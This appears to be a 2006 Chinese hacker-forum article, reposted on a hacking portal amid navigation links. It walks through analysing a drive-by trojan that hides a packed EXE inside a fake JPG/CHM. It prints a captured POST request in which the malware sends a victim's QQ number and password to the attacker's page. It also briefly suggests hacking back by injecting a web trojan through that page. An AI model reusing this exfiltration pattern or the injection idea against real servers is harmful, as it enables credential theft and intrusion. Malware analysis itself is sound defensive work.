黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客进阶 >> 黑客入侵 >> 正文
·没有路由密码权限时的鸽08-23·上网安全 Vista自我防范10-11
·让濒临崩溃的Windows XP10-11·有备无患,快速自制救急10-11
·要你好看!Windows看图工10-11·空间赞助网提供不同类型10-11
·讨论net.exe和net1.exe的10-10·让3389远程桌面传输更通10-10
·巧妙入侵渗透赌博站10-10·Aspx空间扫权限工具10-10
·Windows2003最新提权工具10-10·易淘乐提供100M免费全能10-10
·系统开机密码忘了不着急10-09·中意网络提供免费100M免10-09
·与众不同 Windows XP开始10-08·让桌面图标翻跟斗 在XP上10-08
·上海宽元站长资助计划-提10-08·个性化Windows XP的任务10-07
·趣盘提供3G免费网络硬盘10-07·秀山热线提供200MB免费全10-07
·一次艰辛的提权过程10-06·成功入侵IT大卖场的渗透10-06
·mysqlhack- MYSQL利用工10-06·lanker一句话PHP后门客户10-06
·WIXI提供3G免费多媒体网10-06·新人网络提供100M/ftp免10-06
·如何利用QQ带来高流量10-05·UuShare提供免费网络文件10-05
[图文]实战反击入侵挂马者
      ★★★★

实战反击入侵挂马者

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2006-6-1 9:43:05
本文仅提供思路,转载请注明:善解人衣9011 From HackBase

这天在有问必答区看帖,有个会员问到怎么处理防盗链的问题,OK,打开网址看看,是个影院系统。突然,弹了个CMD出来...不妙...果然...不一会儿可爱的QQ消失了...还好,在NB,重启就行了..呵呵,正愁没好的QQ,开始反击!!!

用迅雷下了网页下来,用记事本打开,搜索iframe,找到了,呵呵...



一看就知道不是什么好东西...继续下载这个网页,用记事本打开,如图:



看到那个unescape吗,找个解密网站解密就行...解密后得到一个jpg地址,继续下载



还是用记事本打开,看到最上面的ITSF吗?上百度搜了下,应该是个CHM文件,直接改为CHM后缀



然后用专门的CHM反编译工具反编译,得到2个文件,1个EXE和1个HTM,(如果你反编译后没有得到任何文件,请用UltraEdit-32打开CHM文件,找到所有的#,改为1再反编译。详细原因可以参见冰狐浪子写的《巧妙防止CHM反编译》



这个HTM直接指向这个EXE文件,接下来用UltraEdit-32打开EXE文件,看开头:



007加的壳,下一步想办法脱壳。只可惜偶不会脱这个...如果你RP比我好,找了个垃圾壳,直接脱壳就可以找他的发送信息了...

PS:如果你已经光荣中马也没关系,拿出抓包器,找到可疑进程,抓包就行,这里不抓图了,看看报文:

POST /a/qz/a.asp HTTP/1.1..Accept: Accept: */*, /a/qz/a.asp, www.XXX.com..Content-Type: application/x-www-form-urlencoded..User-Agent: MyApp..Host: www.XXX.com..Content-Length: 31..Cache-Control: no-cache....num=QQ号&pass=密码

号和QQ密码都出来了,接下来下载他的接受文件,找到那个TXT文件就行...这个文件好象没有任何过滤,修改下数据包,把num=后背加上你的网页木马,或许就可以挂马了...

E-mail收信可以采用同样办法抓包,得到的数据是base64加密的,解密后就可找到邮箱的用户名和密码,剩下的就不归我管呵...
文章录入:cainiaowang    责任编辑:sygbox 
  • 上一篇文章:

  • 下一篇文章:
    • 【字体:
    中介交易区
    最 新 热 门
    一次通过 Oracle8i 入侵系统之旅03-21
    SA权限下的思路变通03-18
    有防火墙的网站整个入侵过程01-21
    绕过Xplog70.dll玩入侵01-14
    一步一步的入侵----only for you01-09
    入侵中快速获得Web根目录的技巧01-09
    记一次对RedHat Linux系统的安全01-08
    介绍几个小工具和入侵的技法(2)01-08
    有防火墙的网站整个入侵过程01-04
    拐弯入侵虚拟主机01-04
    由一次入侵实例看虚拟主机系统的01-02
    解读IDS入侵检测系统术语01-02
    相 关 文 章
    巧妙入侵渗透赌博站
    成功入侵IT大卖场的渗透过程
    检测入侵农业大学理学院!
    入侵渗透股票分析名站
    MSSQL SA权限入侵的感悟
    实战清除MSN病毒NEW PHOTO(图)
    DNS溢出漏洞入侵详细教程
    入侵的艺术(无线渗透)
    入侵新技巧-CMD下加Sql账号
    Microsoft SQL Server SA权限最新入侵方
    妙招让漏洞变陷阱来折磨入侵的人
    我在入侵过程中注意到的细节(完整篇)
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886